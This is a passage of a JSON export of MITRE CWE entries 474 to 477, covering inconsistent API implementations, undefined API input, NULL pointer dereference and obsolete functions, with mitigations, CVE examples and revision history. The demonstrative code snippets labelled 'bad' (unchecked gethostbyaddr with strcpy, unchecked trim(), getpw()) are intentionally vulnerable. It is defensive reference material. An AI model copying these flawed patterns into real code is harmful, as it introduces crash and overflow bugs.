Inconsistent Implementations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses a function that has inconsistent implementations across operating systems and versions.","Extended_Description":{"xhtml:p":["The use of inconsistent implementations can cause changes in behavior when the code is ported or built under a different environment than the programmer expects, which can lead to security problems in some cases.","The implementation of many functions varies by platform, and at times, even by different versions of the same platform. Implementation differences can include:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Slight differences in the way parameters are interpreted leading to inconsistent results.","Some implementations of the function carry significant security risks.","The function might not be defined on all platforms.","The function might change which return codes it can provide, or change the meaning of its return codes."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Requirements"],"Description":"Do not accept inconsistent behavior from the API specifications when the deviant behavior increase the risk level."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Inconsistent Implementations"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Inconsistent Implementations","attr":{"@_Date":"2008-04-11"}}}},"475":{"attr":{"@_ID":"475","@_Name":"Undefined Behavior for Input to API","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The behavior of this function is undefined unless its control parameter is set to a specific value.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Undefined Behavior"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"The Linux Standard Base Specification 2.0.1 for libc places constraints on the arguments to some internal functions [21]. If the constraints are not met, the behavior of the functions is not defined. It is unusual for this function to be called directly. It is almost always invoked through a macro defined in a system header file, and the macro ensures that the following constraints are met: The value 1 must be passed to the third parameter (the version number) of the following file system function: __xmknod The value 2 must be passed to the third parameter (the group argument) of the following wide character string functions: __wcstod_internal __wcstof_internal __wcstol_internal __wcstold_internal __wcstoul_internal The value 3 must be passed as the first parameter (the version number) of the following file system functions: __xstat __lxstat __fxstat __xstat64 __lxstat64 __fxstat64","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Undefined Behavior","attr":{"@_Date":"2008-04-11"}}}},"476":{"attr":{"@_ID":"476","@_Name":"NULL Pointer Dereference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"A NULL pointer dereference occurs when the application dereferences a pointer that it expects to be valid, but is NULL, typically causing a crash or exit.","Extended_Description":"NULL pointer dereference issues can occur through a number of flaws, including race conditions, and simple programming omissions.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant","Description":"NULL pointer dereferences are frequently resultant from rarely encountered error conditions, since these are most likely to escape detection during the testing phases."}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"NULL pointer dereferences usually result in the failure of the process unless exception handling (on some platforms) is available and implemented. Even when exception handling is being used, it can still be very difficult to return the software to a safe state of operation."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Read Memory","Modify Memory"],"Note":"In rare circumstances, when NULL is equivalent to the 0x0 memory address and privileged code can access it, then writing or reading memory is possible, which may lead to code execution."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"If all pointers that could have been modified are sanity-checked previous to use, nearly all NULL pointer dereferences can be prevented."},{"Phase":"Requirements","Description":"The choice could be made to use a language that is not susceptible to these issues."},{"Phase":"Implementation","Description":"Check the results of all functions that return a value and verify that the value is non-null before acting upon it.","Effectiveness":"Moderate","Effectiveness_Notes":"Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment. This solution does not handle the use of improperly initialized variables (CWE-665)."},{"Phase":"Architecture and Design","Description":"Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values."},{"Phase":"Implementation","Description":"Explicitly initialize all your variables and other data stores, either during declaration or just before the first usage."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"While there are no complete fixes aside from conscientious programming, the following steps will go a long way to ensure that NULL pointer dereferences do not occur.","Example_Code":{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"if (pointer1 != NULL) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","",""],"xhtml:i":["/* make use of pointer1 */","/* ... */"]}}}},"Body_Text":"If you are working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the if statement; and unlock when it has finished."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference (CWE-476) would then occur in the call to strcpy().","Note that this code is also vulnerable to a buffer overflow (CWE-119)."]},{"Intro_Text":"In the following code, the programmer assumes that the system always has a property named \\"cmd\\" defined. If an attacker can control the program\'s environment so that \\"cmd\\" is not defined, the program throws a NULL pointer exception when it attempts to call the trim() method.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String cmd = System.getProperty(\\"cmd\\");cmd = cmd.trim();","xhtml:br":""}}},{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-3274","Description":"race condition causes a table to be corrupted if a timer activates while it is being modified, leading to resultant NULL dereference; also involves locking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3274"},{"Reference":"CVE-2002-1912","Description":"large number of packets leads to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1912"},{"Reference":"CVE-2005-0772","Description":"packet with invalid error status value triggers NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0772"},{"Reference":"CVE-2009-4895","Description":"Chain: race condition for an argument value, possibly resulting in NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4895"},{"Reference":"CVE-2009-2692","Description":"Chain: Use of an unimplemented network socket operation pointing to an uninitialized handler function (CWE-456) causes a crash because of a null pointer dereference (CWE-476).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2009-3547","Description":"Chain: race condition might allow resource to be released before operating on it, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547"},{"Reference":"CVE-2009-3620","Description":"Chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620"},{"Reference":"CVE-2009-2698","Description":"Chain: IP and UDP layers each track the same value with different mechanisms that can get out of sync, possibly resulting in a NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2698"},{"Reference":"CVE-2009-2692","Description":"Chain: uninitialized function pointers can be dereferenced allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2009-0949","Description":"Chain: improper initialization of memory can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0949"},{"Reference":"CVE-2008-3597","Description":"Chain: game server can access player data structures before initialization has happened leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3597"},{"Reference":"CVE-2020-6078","Description":"Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6078"},{"Reference":"CVE-2008-0062","Description":"Chain: a message having an unknown message type may cause a reference to uninitialized memory resulting in a null pointer dereference (CWE-476) or dangling pointer (CWE-825), possibly crashing the system or causing heap corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062"},{"Reference":"CVE-2008-5183","Description":"Chain: unchecked return value can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5183"},{"Reference":"CVE-2004-0079","Description":"SSL software allows remote attackers to cause a denial of service (crash) via a crafted SSL/TLS handshake that triggers a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0079"},{"Reference":"CVE-2004-0365","Description":"Network monitor allows remote attackers to cause a denial of service (crash) via a malformed RADIUS packet that triggers a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0365"},{"Reference":"CVE-2003-1013","Description":"Network monitor allows remote attackers to cause a denial of service (crash) via a malformed Q.931, which triggers a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1013"},{"Reference":"CVE-2003-1000","Description":"Chat client allows remote attackers to cause a denial of service (crash) via a passive DCC request with an invalid ID number, which causes a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1000"},{"Reference":"CVE-2004-0389","Description":"Server allows remote attackers to cause a denial of service (crash) via malformed requests that trigger a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0389"},{"Reference":"CVE-2004-0119","Description":"OS allows remote attackers to cause a denial of service (crash from null dereference) or execute arbitrary code via a crafted request during authentication protocol selection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0119"},{"Reference":"CVE-2004-0458","Description":"Game allows remote attackers to cause a denial of service (server crash) via a missing argument, which triggers a null pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0458"},{"Reference":"CVE-2002-0401","Description":"Network monitor allows remote attackers to cause a denial of service (crash) or execute arbitrary code via malformed packets that cause a NULL pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0401"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Null Dereference"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Null-pointer dereference"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Null Dereference (Null Pointer Dereference)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP34-C","Entry_Name":"Do not dereference null pointers","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP7","Entry_Name":"Faulty Pointer Use"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-1031"}},{"attr":{"@_External_Reference_ID":"REF-1032"}},{"attr":{"@_External_Reference_ID":"REF-1033"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Other_Notes, Potential_Mitigations, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"477":{"attr":{"@_ID":"477","@_Name":"Use of Obsolete Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses deprecated or obsolete functions, which suggests that the code has not been actively reviewed or maintained.","Extended_Description":{"xhtml:p":["As programming languages evolve, functions occasionally become obsolete due to:","Functions that are removed are usually replaced by newer counterparts that perform the same task in some different and hopefully improved way."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Advances in the language","Improved understanding of how operations should be performed effectively and securely","Changes in the conventions that govern certain operations"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode Quality Analysis"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Debugger"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source Code Quality Analyzer","Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Origin Analysis"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Formal Methods / Correct-By-Construction","Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Refer to the documentation for the obsolete function in order to determine why it is deprecated or obsolete and to learn about alternative ways to achieve the same functionality."},{"Phase":"Requirements","Description":"Consider seriously the security implications of using an obsolete function. Consider using alternate functions."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code uses the deprecated function getpw() to verify that a plaintext password matches a user\'s encrypted password. If the password is valid, the function sets result to 1; otherwise it is set to 0.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...getpw(uid, pwdline);for (i=0; i<3; i++){}result = strcmp(crypt(plainpw,cryptpw), cryptpw) == 0;...","xhtml:br":["","","",""],"xhtml:div":{"#text":"cryptpw=strtok(pwdline, \\":\\");pwdline=0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Although the code often behaves correctly, using the getpw() function can be problematic from a security standpoint, because it can overflow the buffer passed to its second parameter. Because of this vulnerability, getpw() has been supplanted by getpwuid(), which performs the same lookup as getpw() but returns a pointer to a statically-allocated structure to mitigate the risk. Not all functions are deprecated or replaced because they pose a security risk. However, the presence of an obsolete function often indicates that the surrounding code has been neglected and may be in a state of disrepair. Software security has not been a priority, or even a consideration, for very long. If the program uses deprecated or obsolete functions, it raises the probability that there are security problems lurking nearby."},{"Intro_Text":"In the following code, the programmer assumes that the system always has a property named \\"cmd\\" defined. If an attacker can control the program\'s environment so that \\"cmd\\" is not defined, the program throws a null pointer exception when it attempts to call the \\"Trim()\\" method.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String cmd = null;...cmd = Environment.GetEnvironmentVariable(\\"cmd\\");cmd = cmd.Trim();","xhtml:br":["","",""]}}},{"Intro_Text":"The following code constructs a string object from an array of bytes and a value that specifies the top 8 bits of each 16-bit Unicode character.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String name = new String(nameBytes, highByte);...","xhtml:br":["",""]}},"Body_Text":"In this example, the constructor may not correctly convert bytes to characters depending upon which charset is used to encode the string represented by nameBytes. Due to the evolution 